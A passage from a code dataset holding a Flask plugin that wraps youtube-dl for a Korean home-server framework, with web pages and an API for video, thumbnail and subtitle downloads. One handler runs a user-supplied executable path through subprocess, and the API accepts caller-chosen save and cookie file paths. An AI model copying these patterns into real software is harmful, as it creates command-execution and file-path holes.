"apps.pagos.views.CesionesPagoIndebidoView", "line_number": 32, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "295477930", "text": "import os\nimport traceback\nimport subprocess\n\nfrom flask import Blueprint, request, render_template, redirect, jsonify, abort\nfrom flask_login import login_required\nfrom flask_cors import cross_origin\n\nfrom framework import check_api, socketio\nfrom framework.logger import get_logger\n\nfrom .logic import Logic\nfrom .logic_normal import LogicNormal\nfrom .model import ModelSetting\n\npackage_name = __name__.split('.')[0]\nlogger = get_logger(package_name)\nyoutube_dl_package = LogicNormal.get_youtube_dl_package(\n ModelSetting.get('youtube_dl_package') if ModelSetting.get('youtube_dl_package') else Logic.db_default[\n 'youtube_dl_package'], import_pkg=True)\n\n#########################################################\n# 플러그인 공용\n#########################################################\nblueprint = Blueprint(package_name, package_name, url_prefix='/%s' % package_name,\n template_folder=os.path.join(os.path.dirname(__file__), 'templates'),\n static_folder=os.path.join(os.path.dirname(__file__), 'static'))\n\nmenu = {\n 'main': [package_name, 'youtube-dl'],\n 'sub': [\n ['setting', 
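The URLconf record above names every route, which is what lets views and templates in this app resolve paths symbolically instead of hardcoding them. A small sketch against the same pre-1.8 Django API that the patterns() call implies, assuming this module is included at the site root with settings configured:

# django.core.urlresolvers is the pre-Django-2.0 import path,
# matching the patterns()-era URLconf above
from django.core.urlresolvers import reverse

reverse('pst_compromisos_pago')       # -> '/estado/de/cuenta/'
reverse('pst_compromisos_pago_json')  # -> '/compromisos/de/pago.json/'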
'설정'], ['download', '다운로드'], ['thumbnail', '썸네일 다운로드'], ['sub', '자막 다운로드'], ['list', '목록'],\n ['log', '로그']\n ],\n 'category': 'vod'\n}\n\nplugin_info = {\n 'version': '3.0.1',\n 'name': 'youtube-dl',\n 'category_name': 'vod',\n 'developer': 'joyfuI',\n 'description': '유튜브, 네이버TV 등 동영상 사이트에서 동영상 다운로드',\n 'home': 'https://github.com/joyfuI/youtube-dl',\n 'more': ''\n}\n\n\ndef plugin_load():\n Logic.plugin_load()\n\n\ndef plugin_unload():\n Logic.plugin_unload()\n\n\n#########################################################\n# WEB Menu\n#########################################################\n@blueprint.route('/')\ndef home():\n return redirect('/%s/list' % package_name)\n\n\n@blueprint.route('/')\n@login_required\ndef first_menu(sub):\n try:\n arg = {\n 'package_name': package_name,\n 'template_name': '%s_%s' % (package_name, sub)\n }\n\n if sub == 'setting':\n arg.update(ModelSetting.to_dict())\n arg['package_list'] = LogicNormal.get_youtube_dl_package()\n arg['youtube_dl_version'] = LogicNormal.get_youtube_dl_version()\n arg['DEFAULT_FILENAME'] = LogicNormal.get_default_filename()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'download':\n default_filename = ModelSetting.get('default_filename')\n arg['filename'] = default_filename if default_filename else LogicNormal.get_default_filename()\n arg['preset_list'] = LogicNormal.get_preset_list()\n arg['postprocessor_list'] = LogicNormal.get_postprocessor_list()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'thumbnail':\n default_filename = ModelSetting.get('default_filename')\n arg['filename'] = default_filename if default_filename else LogicNormal.get_default_filename()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'sub':\n default_filename = ModelSetting.get('default_filename')\n arg['filename'] = default_filename if default_filename else LogicNormal.get_default_filename()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'list':\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'log':\n return render_template('log.html', package=package_name)\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n return render_template('sample.html', title='%s - %s' % (package_name, sub))\n\n\n#########################################################\n# For UI\n#########################################################\n@blueprint.route('/ajax/', methods=['POST'])\n@login_required\ndef ajax(sub):\n logger.debug('AJAX %s %s', package_name, sub)\n try:\n # 공통 요청\n if sub == 'setting_save':\n ret = ModelSetting.setting_save(request)\n if request.form['ffmpeg_path'] == 'ffmpeg':\n ModelSetting.set('ffmpeg_path', '')\n return jsonify(ret)\n\n # UI 요청\n elif sub == 'ffmpeg_version':\n path = request.form['path']\n ret = subprocess.check_output([path, '-version'])\n ret = ret.decode().replace('\\n', '
')\n return jsonify(ret)\n\n elif sub == 'download':\n postprocessor = request.form['postprocessor']\n video_convertor, extract_audio = LogicNormal.get_postprocessor()\n preferedformat = None\n preferredcodec = None\n preferredquality = None\n if postprocessor in video_convertor:\n preferedformat = postprocessor\n elif postprocessor in extract_audio:\n preferredcodec = postprocessor\n preferredquality = 192\n youtube_dl = LogicNormal.download(plugin=package_name,\n url=request.form['url'],\n filename=request.form['filename'],\n temp_path=ModelSetting.get('temp_path'),\n save_path=ModelSetting.get('save_path'),\n format=request.form['format'],\n preferedformat=preferedformat,\n preferredcodec=preferredcodec,\n preferredquality=preferredquality,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'))\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify([])\n\n elif sub == 'thumbnail':\n youtube_dl = LogicNormal.thumbnail(plugin=package_name,\n url=request.form['url'],\n filename=request.form['filename'],\n temp_path=ModelSetting.get('temp_path'),\n save_path=ModelSetting.get('save_path'),\n all_thumbnails=request.form['all_thumbnails'],\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'))\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify([])\n\n elif sub == 'sub':\n youtube_dl = LogicNormal.sub(plugin=package_name,\n url=request.form['url'],\n filename=request.form['filename'],\n temp_path=ModelSetting.get('temp_path'),\n save_path=ModelSetting.get('save_path'),\n all_subs=request.form['all_subs'],\n sub_lang=request.form['sub_lang'],\n auto_sub=request.form['auto_sub'],\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'))\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify([])\n\n elif sub == 'list':\n ret = []\n for i in LogicNormal.youtube_dl_list:\n data = LogicNormal.get_data(i)\n if data is not None:\n ret.append(data)\n return jsonify(ret)\n\n elif sub == 'all_stop':\n for i in LogicNormal.youtube_dl_list:\n i.stop()\n return jsonify([])\n\n elif sub == 'stop':\n index = int(request.form['index'])\n LogicNormal.youtube_dl_list[index].stop()\n return jsonify([])\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n\n\n#########################################################\n# API\n#########################################################\n# API 명세는 https://github.com/joyfuI/youtube-dl#api\n@blueprint.route('/api/', methods=['GET', 'POST'])\n@cross_origin()\n@check_api\ndef api(sub):\n plugin = request.values.get('plugin')\n logger.debug('API %s %s: %s', package_name, sub, plugin)\n if not plugin: # 요청한 플러그인명이 빈문자열이거나 None면\n abort(403) # 403 에러(거부)\n try:\n # 동영상 정보를 반환하는 API\n if sub == 'info_dict':\n url = request.values.get('url')\n ret = {\n 'errorCode': 0,\n 'info_dict': None\n }\n if None in (url,):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n info_dict = LogicNormal.get_info_dict(url, ModelSetting.get('proxy'))\n if info_dict is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['info_dict'] = info_dict\n return jsonify(ret)\n\n # 비디오 다운로드 준비를 요청하는 API\n elif sub == 'download':\n key = request.values.get('key')\n url = request.values.get('url')\n filename = request.values.get('filename', ModelSetting.get('default_filename'))\n save_path = request.values.get('save_path', 
ModelSetting.get('save_path'))\n format_code = request.values.get('format', None)\n preferedformat = request.values.get('preferedformat', None)\n preferredcodec = request.values.get('preferredcodec', None)\n preferredquality = request.values.get('preferredquality', 192)\n dateafter = request.values.get('dateafter', None)\n playlist = request.values.get('playlist', None)\n archive = request.values.get('archive', None)\n start = request.values.get('start', False)\n cookiefile = request.values.get('cookiefile', None)\n ret = {\n 'errorCode': 0,\n 'index': None\n }\n if None in (key, url):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n if preferredcodec not in (None, 'best', 'mp3', 'aac', 'flac', 'm4a', 'opus', 'vorbis', 'wav'):\n return LogicNormal.abort(ret, 5) # 허용되지 않은 값이 있음\n if not filename:\n filename = LogicNormal.get_default_filename()\n youtube_dl = LogicNormal.download(plugin=plugin,\n url=url,\n filename=filename,\n temp_path=ModelSetting.get('temp_path'),\n save_path=save_path,\n format=format_code,\n preferedformat=preferedformat,\n preferredcodec=preferredcodec,\n preferredquality=preferredquality,\n dateafter=dateafter,\n playlist=playlist,\n archive=archive,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'),\n key=key,\n cookiefile=cookiefile)\n if youtube_dl is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['index'] = youtube_dl.index\n if start:\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify(ret)\n\n # 썸네일 다운로드 준비를 요청하는 API\n elif sub == 'thumbnail':\n key = request.values.get('key')\n url = request.values.get('url')\n filename = request.values.get('filename', ModelSetting.get('default_filename'))\n save_path = request.values.get('save_path', ModelSetting.get('save_path'))\n all_thumbnails = request.values.get('all_thumbnails', False)\n dateafter = request.values.get('dateafter', None)\n playlist = request.values.get('playlist', None)\n archive = request.values.get('archive', None)\n start = request.values.get('start', False)\n cookiefile = request.values.get('cookiefile', None)\n ret = {\n 'errorCode': 0,\n 'index': None\n }\n if None in (key, url):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n if not filename:\n filename = LogicNormal.get_default_filename()\n youtube_dl = LogicNormal.thumbnail(plugin=plugin,\n url=url,\n filename=filename,\n temp_path=ModelSetting.get('temp_path'),\n save_path=save_path,\n all_thumbnails=all_thumbnails,\n dateafter=dateafter,\n playlist=playlist,\n archive=archive,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'),\n key=key,\n cookiefile=cookiefile)\n if youtube_dl is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['index'] = youtube_dl.index\n if start:\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify(ret)\n\n # 자막 다운로드 준비를 요청하는 API\n elif sub == 'sub':\n key = request.values.get('key')\n url = request.values.get('url')\n filename = request.values.get('filename', ModelSetting.get('default_filename'))\n save_path = request.values.get('save_path', ModelSetting.get('save_path'))\n all_subs = request.values.get('all_subs', False)\n sub_lang = request.values.get('sub_lang', 'ko')\n auto_sub = request.values.get('all_subs', False)\n dateafter = request.values.get('dateafter', None)\n playlist = request.values.get('playlist', None)\n archive = 
request.values.get('archive', None)\n start = request.values.get('start', False)\n cookiefile = request.values.get('cookiefile', None)\n ret = {\n 'errorCode': 0,\n 'index': None\n }\n if None in (key, url):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n if not filename:\n filename = LogicNormal.get_default_filename()\n youtube_dl = LogicNormal.sub(plugin=plugin,\n url=url,\n filename=filename,\n temp_path=ModelSetting.get('temp_path'),\n save_path=save_path,\n all_subs=all_subs,\n sub_lang=sub_lang,\n auto_sub=auto_sub,\n dateafter=dateafter,\n playlist=playlist,\n archive=archive,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'),\n key=key,\n cookiefile=cookiefile)\n if youtube_dl is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['index'] = youtube_dl.index\n if start:\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify(ret)\n\n # 다운로드 시작을 요청하는 API\n elif sub == 'start':\n index = request.values.get('index')\n key = request.values.get('key')\n ret = {\n 'errorCode': 0,\n 'status': None\n }\n if None in (index, key):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n index = int(index)\n if not (0 <= index < len(LogicNormal.youtube_dl_list)):\n return LogicNormal.abort(ret, 3) # 인덱스 범위를 벗어남\n youtube_dl = LogicNormal.youtube_dl_list[index]\n if youtube_dl.key != key:\n return LogicNormal.abort(ret, 4) # 키가 일치하지 않음\n ret['status'] = youtube_dl.status.name\n if not youtube_dl.start():\n return LogicNormal.abort(ret, 10) # 실패\n return jsonify(ret)\n\n # 다운로드 중지를 요청하는 API\n elif sub == 'stop':\n index = request.values.get('index')\n key = request.values.get('key')\n ret = {\n 'errorCode': 0,\n 'status': None\n }\n if None in (index, key):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n index = int(index)\n if not (0 <= index < len(LogicNormal.youtube_dl_list)):\n return LogicNormal.abort(ret, 3) # 인덱스 범위를 벗어남\n youtube_dl = LogicNormal.youtube_dl_list[index]\n if youtube_dl.key != key:\n return LogicNormal.abort(ret, 4) # 키가 일치하지 않음\n ret['status'] = youtube_dl.status.name\n if not youtube_dl.stop():\n return LogicNormal.abort(ret, 10) # 실패\n return jsonify(ret)\n\n # 현재 상태를 반환하는 API\n elif sub == 'status':\n index = request.values.get('index')\n key = request.values.get('key')\n ret = {\n 'errorCode': 0,\n 'status': None,\n 'type': None,\n 'start_time': None,\n 'end_time': None,\n 'temp_path': None,\n 'save_path': None\n }\n if None in (index, key):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n index = int(index)\n if not (0 <= index < len(LogicNormal.youtube_dl_list)):\n return LogicNormal.abort(ret, 3) # 인덱스 범위를 벗어남\n youtube_dl = LogicNormal.youtube_dl_list[index]\n if youtube_dl.key != key:\n return LogicNormal.abort(ret, 4) # 키가 일치하지 않음\n ret['status'] = youtube_dl.status.name\n ret['type'] = youtube_dl.type\n ret['start_time'] = youtube_dl.start_time.strftime('%Y-%m-%dT%H:%M:%S') if \\\n youtube_dl.start_time is not None else None\n ret['end_time'] = youtube_dl.end_time.strftime('%Y-%m-%dT%H:%M:%S') if \\\n youtube_dl.end_time is not None else None\n ret['temp_path'] = youtube_dl.temp_path\n ret['save_path'] = youtube_dl.save_path\n return jsonify(ret)\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n abort(500) # 500 에러(서버 오류)\n abort(404) # 404 에러(페이지 없음)\n\n\n#########################################################\n# 
socketio\n#########################################################\ndef socketio_emit(cmd, data):\n socketio.emit(cmd, LogicNormal.get_data(data), namespace='/%s' % package_name, broadcast=True)\n", "sub_path": "plugin.py", "file_name": "plugin.py", "file_ext": "py", "file_size_in_byte": 21279, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "framework.logger.get_logger", "line_number": 17, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.get_youtube_dl_package", "line_number": 18, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 18, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 19, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 19, "usage_type": "name"}, {"api_name": "logic.Logic.db_default", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logic.Logic", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.Blueprint", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "logic.Logic.plugin_load", "line_number": 50, "usage_type": "call"}, {"api_name": "logic.Logic", "line_number": 50, "usage_type": "name"}, {"api_name": "logic.Logic.plugin_unload", "line_number": 54, "usage_type": "call"}, {"api_name": "logic.Logic", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 62, "usage_type": "call"}, {"api_name": "model.ModelSetting.to_dict", "line_number": 75, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 75, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_youtube_dl_package", "line_number": 76, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 76, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_youtube_dl_version", "line_number": 77, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 77, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 78, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "model.ModelSetting.get", "line_number": 82, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 82, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 83, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 83, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_preset_list", "line_number": 84, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 84, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_postprocessor_list", "line_number": 85, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "model.ModelSetting.get", "line_number": 89, 
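Every API branch in the plugin code above follows one convention: build a ret dict with errorCode 0, bail out early through an abort helper that stamps a non-zero code, and jsonify either way so callers always receive the same envelope. A minimal stand-in for that pattern in plain Flask; the route and helper here are illustrative, not the plugin's actual implementation:

from flask import Flask, jsonify, request

app = Flask(__name__)

def api_abort(ret, code):
    ret['errorCode'] = code  # non-zero errorCode tells the caller what failed
    return jsonify(ret)

@app.route('/api/info')
def info():
    ret = {'errorCode': 0, 'info': None}
    url = request.values.get('url')
    if url is None:
        return api_abort(ret, 1)    # required parameter missing
    if not url.startswith('http'):
        return api_abort(ret, 2)    # malformed video URL
    ret['info'] = {'url': url}
    return jsonify(ret)             # errorCode stays 0 on success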
"usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 89, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 90, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "model.ModelSetting.get", "line_number": 94, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 94, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 95, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 66, "usage_type": "name"}, {"api_name": "model.ModelSetting.setting_save", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "argument"}, {"api_name": "model.ModelSetting", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 120, "usage_type": "name"}, {"api_name": "model.ModelSetting.set", "line_number": 121, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 126, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 126, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_postprocessor", "line_number": 133, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 133, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.download", "line_number": 142, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 145, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 145, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 146, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 146, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 151, "usage_type": "call"}, {"api_name": 
"model.ModelSetting", "line_number": 151, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 152, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 155, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.thumbnail", "line_number": 158, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 160, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 160, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 161, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 161, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 162, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 162, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 163, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 164, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 164, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 165, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 165, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 168, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.sub", "line_number": 171, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 171, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 172, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 173, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 173, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 174, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 174, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 175, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 175, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 176, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 176, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 178, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 178, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 179, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 179, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 180, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 183, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 187, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 187, "usage_type": "name"}, {"api_name": 
"logic_normal.LogicNormal.get_data", "line_number": 188, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 188, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 191, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 194, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 194, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 199, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 199, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 200, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 200, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 201, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 204, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 215, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 215, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 215, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 228, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 228, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 230, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 230, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_info_dict", "line_number": 231, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 231, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 231, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 231, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 233, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 233, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 240, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 240, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 241, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 241, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 241, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 241, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 242, "usage_type": "call"}, 
{"api_name": "flask.request.values", "line_number": 242, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 242, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 242, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 242, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 244, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 244, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 245, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 245, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 246, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 246, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 246, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 249, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 249, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 250, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 250, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 251, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 251, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 251, "usage_type": "name"}, {"api_name": 